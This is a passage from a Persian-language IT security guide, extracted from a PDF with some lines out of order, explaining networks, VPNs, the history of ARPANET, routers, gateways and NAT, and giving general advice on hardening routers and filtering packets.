ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺗﻨﻬﺎ ﺭﻭﺵ ﺷﻨﺎﺳﺎﻳﻲ ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺧﺎﻧﻤﺎﻥ ،ﻣﺸﺎﻫﺪﺓ ﺑﺼﺮﻱ ﺟﻌﺒﻪﺗﻘﺴﻴﻤﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺳﻴﻢﻛﺸﻲ ﻭ ﺳﺎﻳﺮ ﻧﻘﺎﻃﻲ ﺍﺳﺖ
ﻛﻪ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﺑﻴﺮﻭﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻭﺍﺭﺩ ﺳﺎﺯﻣﺎﻥ ﺷﻮﻧﺪ؛ ﻭ ﺩﺭ ﻣﺤﻴﻄﻲ ﻛﻪ ﭘﺮ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﺠﺎﺯ ﺍﺳﺖ ،ﺷﻨﺎﺳﺎﻳﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﻲﺳﻴﻢ
ﻏﻴﺮﻣﺠﺎﺯ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭﺗﺮ ﺍﺯ ﺍﻳﻦ ﻣﻲﺑﺎﺷﺪ.
ﺷﺒﻜﻪﻫﺎ
ﮔﺮﭼﻪ ﻣﻮﺩﻣﻬﺎﻱ ﺗﻠﻔﻨﻲ ﻫﻨﻮﺯ ﺑﻄﻮﺭ ﻭﺳﻴﻌﻲ ﺑﺮﺍﻱ ﻣﺘﺼﻞ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ،ﻣﻴﻠﻴﻮﻧﻬﺎ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪﻫﺎﻱ ﭘﺮﺳﺮﻋﺖﺗﺮ ﺑﺎ
ﻻ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺩﻧﻴﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﺑﻪ ﺩﻭ ﺩﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻣﻲﻛﻨﻨﺪ:
ﻳﻜﺪﻳﮕﺮ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ .ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﻋﻤﻠﻲ ،ﺍﻣﺮﻭﺯﻩ ﻣﻌﻤﻮ ﹰ
ﻳﻚ ﻧﻮﻉ ﺧﺎﺹ ﺷﺒﻜﻪﻫﺎﻱ ﮔﺴﺘﺮﺩﻩ ﻛﻪ ﺍﺳﺘﻔﺎﺩﺓ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩ ،ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ ) (VPNﺍﺳﺖ VPN .ﻳﻚ ﺷﺒﻜﺔ
ﻣﺠﺎﺯﻱ ﺍﺳﺖ ،ﭼﻮﻥ ﺑﺴﺘﻪﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ )ﻳﺎ ﺷﺒﻜﻪ ﻋﻤﻮﻣﻲ ﺩﻳﮕﺮﻱ( ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ؛ ﻭ ﻧﻴﺰ ﻳﻚ ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﺑﺮﺍﻱ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻣﻄﻠﻊﺷﺪﻥ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺒﻜﺔ ﻋﻤﻮﻣﻲ ﺍﺯ ﻣﺤﺘﻮﻳﺎﺕ ﺑﺴﺘﻪﻫﺎ ﻭ ﻳﺎ ﺩﺳﺘﻜﺎﺭﻱ ﺁﻥ ﻣﺤﺘﻮﻳﺎﺕ ﺗﻮﺳﻂ ﺁﻧﺎﻥ ،ﺩﺍﺩﻩﻫﺎﻱ ﺩﺭﻭﻥ
ﺑﺴﺘﻪﻫﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ VPN .ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻫﺰﻳﻨﻪﺍﻱ ﺑﺴﻴﺎﺭ ﭘﺎﻳﻴﻨﺘﺮ ﺍﺯ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﺍﺳﺘﻴﺠﺎﺭﻱ ،ﻣﻨﺎﻃﻖ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻛﻨﺪ.
ﻳﻜﻲ ﺍﺯ ﺍﻭﻟﻴﻦ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ARPANETﺑﻮﺩ ﻛﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﺩﻫﺔ ١٩٧٠ﺗﻮﺳﻂ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺳﺎﺯﻣﺎﻥ
ﭘﺮﻭﮊﻩﻫﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﭘﻴﺸﺮﻓﺘﻪ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ) ARPAﻳﺎ (DARPAﺑﻮﺟﻮﺩ ﺁﻣﺪ ARPANET .ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ
ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﻣﺘﺼﻞ ﺳﺎﺧﺖ ﻭ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺷﺎﻫﺮﺍﻩ ٢٥٠ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻭ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺩﻳﮕﺮ ﻛﻪ ﺩﺭ ﺩﻫﺔ ١٩٨٠ﺑﻮﺟﻮﺩ ﺁﻣﺪﻧﺪ
ﺑﻜﺎﺭ ﺭﻓﺖ.
249 Broadcast
250 Backbone
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٨٨
ﺍﻣﺮﻭﺯ ﻧﻮﺍﺩﺓ ARPANETﺗﺤﺖ ﻋﻨﻮﺍﻥ ﺍﻳﻨﺘﺮﻧﺖ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ .ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺷﺒﻜﺔ ﻣﺒﺘﻨﻲ ﺑﺮ IPﺍﺳﺖ ﻛﻪ ﺻﺪﻫﺎ ﻣﻴﻠﻴﻮﻥ ﺭﺍﻳﺎﻧﻪ ﻭ
ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻴﻠﻴﺎﺭﺩ ﻛﺎﺭﺑﺮ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ .ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﻣﭙﻴﻮﺗﺮﻱ ﻫﻤﻮﺍﺭﻩ ﺑﻪ ﺍﻳﻦ ﺷﺒﻜﻪ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ
ﻭ ﻣﺎﺑﻘﻲ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﻪ ﺁﻥ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ .ﻫﺮ ﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻼﺵ ﻛﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻔﺮﺳﺘﺪ ،ﺑﺎ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ FTPﺷﻤﺎ ﭼﻨﺪ ﻓﺎﻳﻞ ﻣﺒﺎﺩﻟﻪ ﻛﻨﺪ ،ﻭ ﻳﺎ )ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﺑﺎﺷﺪ ﻛﻪ ﺑﻪ ﺁﻧﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻻﺯﻡ ﺭﺍ ﺑﺪﻫﺪ( ﺑﻪ
ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻧﻔﻮﺫ ﻛﻨﺪ.
ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﻭ ﺩﺭﻭﺍﺯﻩﻫﺎ
ﻋﻠﻴﺮﻏﻢ ﭘﻴﭽﻴﺪﮔﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺁﺩﺭﺱﺩﻫﻲ ﺑﺮ ﻣﺒﻨﺎﻱ ،IPﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﭘﻴﺎﻡ ﺑﻔﺮﺳﺘﻨﺪ.
ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﺑﺴﺘﻪ ،ﺍﻛﺜﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗﻨﻬﺎ ﻣﻘﺼﺪ ﻧﻬﺎﻳﻲ ﺑﺴﺘﻪ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﻭ ﺳﭙﺲ ﺑﺴﺘﻪ ﺭﺍ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻧﺎﻡ "ﺩﺭﻭﺍﺯﻩ" ﺩﺭ ﺷﺒﻜﺔ
ﻣﺤﻠﻲ ﺧﻮﺩ ﻣﻲﻓﺮﺳﺘﻨﺪ .ﺍﮔﺮ ﺍﻳﻦ ﺩﺭﻭﺍﺯﻩ ﺧﻮﺩ ﺗﻌﻴﻴﻦﻛﻨﻨﺪﺓ ﻣﻘﺼﺪ ﺑﻌﺪﻱ ﺑﺴﺘﻪ ﺩﺭ ﻣﺴﻴﺮ ﺍﺭﺳﺎﻝ ﺁﻥ ﺑﻪ ﻣﻘﺼﺪ ﻧﻬﺎﻳﻲ ﺑﺎﺷﺪ ،ﺑﻪ ﺁﻥ
"ﻣﺴﻴﺮﻳﺎﺏ" ﻣﻲﮔﻮﻳﻨﺪ .ﻣﺴﻴﺮﻳﺎﺏ ﺑﺮﺍﻱ ﺭﺳﺎﻧﺪﻥ ﺑﺴﺘﻪ ﺑﻪ ﻣﻘﺼﺪ ﻧﻬﺎﻳﻲ ،ﺁﻧﺮﺍ ﺑﻪ ﻳﻚ ﺩﺭﻭﺍﺯﻩ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﺁﻥ ﻣﺘﺼﻞ ﺍﺳﺖ ﻭ ﮔﻤﺎﻥ
ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﻗﺪﻡ ﻧﺰﺩﻳﻜﺘﺮ ﺑﻪ ﻣﻘﺼﺪ ﻧﻬﺎﻳﻲ ﺑﺎﺷﺪ ﻣﻲﻓﺮﺳﺘﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﻳﻚ ﺩﺭﺧﺖ ﺑﺰﺭﮒ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺭﻳﺸﺔ ﺁﻥ ،ﺍﺭﺗﺒﺎﻁ ﺳﺎﺯﻣﺎﻥ ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ
ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺩﺭﻭﺍﺯﻩ ﻳﻚ ﺑﺴﺘﻪ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ ،ﺗﺼﻤﻴﻢ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﺁﻧﺮﺍ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺯﻳﺮﺷﺒﻜﻪﻫﺎﻱ ﺧﻮﺩ ﺑﻔﺮﺳﺘﺪ ﻭ ﻳﺎ ﺑﻪ ﺳﻮﻱ
ﺭﻳﺸﻪ ﻫﺪﺍﻳﺖ ﻛﻨﺪ .ﺩﺭ ﺑﻴﺮﻭﻥ ،ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ،ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺍﺻﻠﻲ IPﺷﺒﻜﻪﺍﻱ ﭘﻴﭽﻴﺪﻩ ،ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻣﺴﻴﺮﻳﺎﺑﻲ ﭘﻴﺸﺮﻓﺘﻪ ،ﻭ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ
ﻣﺴﻴﺮﻳﺎﺑﻲ ﻣﺨﺼﻮﺹ ﺩﺍﺭﻧﺪ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻱ ﻫﻤﭙﻮﺷﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺍﮔﺮ ﻳﻚ ﺍﺗﺼﺎﻝ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩ ،ﺳﺎﻳﺮ ﺍﺗﺼﺎﻻﺕ
ﻫﻤﭽﻨﺎﻥ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻧﮕﻬﺪﺍﺭﻧﺪ.
ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﻧﮕﻲ ﻭ ﺍﺩﺍﺭﺍﺕ ﻛﻮﭼﻚ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ٤ﻳﺎ ٨ﭘﻮﺭﺗﻲ Ethernetﺗﻬﻴﻪ ﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑﻪ ﻳﻚ DSL
ﺑﺎ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺯﻳﺎﺩ ﻭ ﻳﺎ ﻣﻮﺩﻣﻬﺎﻱ ﻛﺎﺑﻠﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻭ ﺁﻥ ﺍﺗﺼﺎﻝ ﭘﺮﺳﺮﻋﺖ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﺑﻪ
ﺍﻳﻨﺘﺮﻧﺖ ﻫﺪﺍﻳﺖ ﻣﻲﻛﻨﻨﺪ .ﻳﻜﻲ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎ )ﻭ ﻧﻴﺰ ﺩﺳﺘﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﺍﻧﺘﻬﺎﻳﻲ ٢٥١ﭘﺸﺘﻴﺒﺎﻧﻲ
ﻣﻲﺷﻮﻧﺪ( ﻗﺎﺑﻠﻴﺖ ﺗﺮﺟﻤﺔ ﺁﺩﺭﺱ ﺷﺒﻜﻪ ) ٢٥٢(NATﺍﺳﺖ NAT .ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺮﺟﻤﺔ ﺁﺩﺭﺳﻬﺎﻱ IPﺑﺴﺘﻪﻫﺎﻱ ﺩﺭﻳﺎﻓﺘ ﹺ
ﻲ
ﻣﺴﻴﺮﻳﺎﺏ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ ﺩﻳﮕﺮ ،ﻗﺒﻞ )ﻳﺎ ﺑﻌﺪ( ﺍﺯ ﺗﻌﻴﻴﻦ ﻣﻘﺼﺪ ﺑﺴﺘﻪ ﺗﻮﺳﻂ ﻣﺴﻴﺮﻳﺎﺏ ﻭ ﺍﺭﺳﺎﻝ ﺁﻥ ﺑﻪ ﻣﻘﺼﺪ ﺍﺳﺖ ﻛﻪ ﻋﻤﻮﻣﹰﺎ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺍﻳﻦ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻣﻜﺎﻥ ﺍﺳﺘﻔﺎﺩﺓ ﭼﻨﺪﻳﻦ ﺭﺍﻳﺎﻧﺔ ﺩﺍﺧﻠﻲ ﺑﺎ ﺁﺩﺭﺳﻬﺎﻱ IPﻣﺤﺮﻣﺎﻧﻪ )ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﻣﺴﻴﺮﻳﺎﺑﻲ( ﺍﺯ ﻳﻚ ﺁﺩﺭﺱ IPﺧﺎﺭﺟﻲ
)ﻋﻤﻮﻣﻲ( ﻭﺍﺣﺪ ،ﻭ ﻳﺎ ﺑﺮﺍﻱ ﺗﺮﺟﻤﺔ ﺁﺩﺭﺳﻬﺎﻱ IPﻋﻤﻮﻣﻲ ﮔﺮﻭﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ IPﺧﺼﻮﺻﻲ ﻣﺘﻨﺎﻇﺮ ﺩﺭ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺑﻜﺎﺭ
ﻣﻲﺭﻭﺩ .ﺍﺯ ﺁﻧﺠﺎﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ IPﺩﺍﺧﻠﻲ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﻧﻴﺴﺘﻨﺪ )ﭼﺮﺍﻛﻪ ﻫﻴﭻ ﻣﺴﻴﺮﻳﺎﺏ ﺩﻳﮕﺮﻱ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﺪﺭﺳﺘﻲ
ﻫﺪﺍﻳﺖ ﻛﻨﺪ( NAT ،ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﺗﺼﺎﻻﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﺭﻭﻱ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﺍﺧﻠﻲ ﺍﻳﺠﺎﺩ ﻣﻲﺷﻮﺩ ﻧﻮﻋﻲ ﺣﻔﺎﻇﺖ ﺍﻳﺠﺎﺩ
ﻛﻨﺪ ،ﻫﺮﭼﻨﺪ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﺍﺧﻠﻲ ﻫﻤﭽﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺑﺎﺷﻨﺪ.
ﻣﺸﺨﺼﺔ ﺑﻌﺪﻱ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﺍﻧﺘﻬﺎﻳﻲ ،ﺗﻮﺍﻧﺎﻳﻲ ﺁﻧﻬﺎ ﺩﺭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ ) (VPNﻣﻴﺎﻥ ﺩﻭ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ
ﻼ ﺩﻭ ﺩﻓﺘﺮ ﻳﻚ ﺳﺎﺯﻣﺎﻥ -ﺍﺳﺖ .ﻳﻚ ﺟﻔﺖ ﻣﺴﻴﺮﻳﺎﺏ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﻣﺎﻧﻨﺪ IPsecﻭ ﺍﻧﺘﻘﺎﻝ ﺍﻣﻦﺟﺪﺍﮔﺎﻧﻪ -ﻣﺜ ﹰ
ﺑﺴﺘﻪﻫﺎ ﻣﻴﺎﻥ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭼﻴﺰﻱ ﺷﺒﻴﻪ ﻳﻚ ﺗﻮﻧﻞ ﻣﺠﺎﺯﻱ ﻭ ﻧﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺣﻔﺎﻇﺖﻧﺸﺪﻩ VPN ،ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﻧﺪ.
ﻻ ﻣﺮﺯﻫﺎﻱ ﻣﺤﺪﻭﺩﺓ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﺒﻜﻪ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﻧﻘﻄﺔ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻣﺤﺴﻮﺏ ﺷﻮﻧﺪ .ﻣﻬﺎﺟﻤﺎﻥ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﻣﻌﻤﻮ ﹰ
ﺑﺎ ﺩﺳﺘﻜﺎﺭﻱ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﻘﺼﺪ ﺳﺎﺯﻣﺎﻥ ﺍﺭﺳﺎﻝ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺩﻳﮕﺮﻱ ﻫﺪﺍﻳﺖ ﻛﻨﻨﺪ ،ﻳﺎ ﺑﻪ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ
ﺩﺍﺧﻠﻲ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﭼﻴﻨﺶ ﺷﺒﻜﻪ ٢٥٣ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻴﺎﺑﻨﺪ .ﻫﺮ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻣﺴﻴﺮﻳﺎﺏ ،ﻭﻳﮋﮔﻴﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ
ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺍﻣﻦ ﻛﺮﺩﻥ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﻛﺎﺭ ﺩﺷﻮﺍﺭﻱ ﺷﻮﺩ .ﻳﻚ ﭘﻴﺸﻨﻬﺎﺩ ﻋﻤﻠﻲ ﺍﻳﻦ ﺍﺳﺖ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺗﻨﻬﺎ ﺑﺎ ﺩﺳﺘﺮﺳﻲ
ﻓﻴﺰﻳﻜﻲ )ﻭ ﻣﺜ ﹰﻼ ﺑﺎ ﭘﺎﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑﺎ ﻳﻚ ﻛﺎﺑﻞ ﺳﺮﻳﺎﻝ ﺑﻪ ﻣﺴﻴﺮﻳﺎﺏ ﻣﺘﺼﻞ ﺍﺳﺖ( ﻗﺎﺑﻞ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻫﺴﺘﻨﺪ ﻭ ﻧﻤﻲﺗﻮﺍﻥ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻭ
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﺗﻐﻴﻴﺮ ﺩﺍﺩ .ﮔﺰﻳﻨﻪﻫﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺑﺎﻳﺪ ﻫﻤﻮﺍﺭﻩ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﮔﺮ ﻗﺮﺍﺭ ﺍﺳﺖ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺍﺯ ﻃﺮﻳﻖ
SNMPﻣﺪﻳﺮﻳﺖ ﺷﻮﻧﺪ ،ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻧﺪﻥ ﺍﺯ ﺭﻭﻱ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻭ ﺩﺳﺘﺮﺳﻲ ﻧﻮﺷﺘﻦ ﻧﻴﺰ ﺑﺮﺍﻳﺸﺎﻥ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﺪ.
٢٥٤
ﺑﺎﺷﻨﺪ ﺗﺎ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﺷﺒﻜﻪ ﻧﻔﺮﺳﺘﻨﺪ ،ﻣﮕﺮ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺁﺩﺭﺱ IP ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﻣﺮﺯﻱ ﺑﺎﻳﺪ ﻣﺠﻬﺰ ﺑﻪ ﺻﺎﻓﻴﻬﺎﻱ ﺧﺮﻭﺟﻲ
٢٥٥
ﻣﺒﺪﺃ ﺑﺴﺘﻪ ،ﻣﻌﺘﺒﺮ ﻭ ﻳﻚ ﺁﺩﺭﺱ ﻣﺘﻌﻠﻖ ﺑﻪ ﺁﻥ ﺷﺒﻜﻪ ﺑﺎﺷﺪ .ﺍﻳﻦ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﻣﺠﻬﺰ ﺑﻪ ﺻﺎﻓﻴﻬﺎﻱ ﻭﺭﻭﺩﻱ ﺑﺎﺷﻨﺪ ﺗﺎ
ﺑﺴﺘﻪﻫﺎﻱ ﺟﻌﻠﻲ ﻛﻪ ﻣﺪﻋﻲ ﻫﺴﺘﻨﺪ ﺍﺯ ﺩﺍﺧﻞ ﺷﺒﻜﻪ ﺁﻣﺪﻩﺍﻧﺪ ،ﺭﻭﻱ ﻭﺍﺳﻂ ﺧﺎﺭﺟﻲ ﻣﺴﻴﺮﻳﺎﺏ ﭘﺬﻳﺮﻓﺘﻪ ﻧﺸﺪﻩ ﻭ ﺑﻪ ﺩﺍﺧﻞ ﻓﺮﺳﺘﺎﺩﻩ ﻧﺸﻮﻧﺪ.
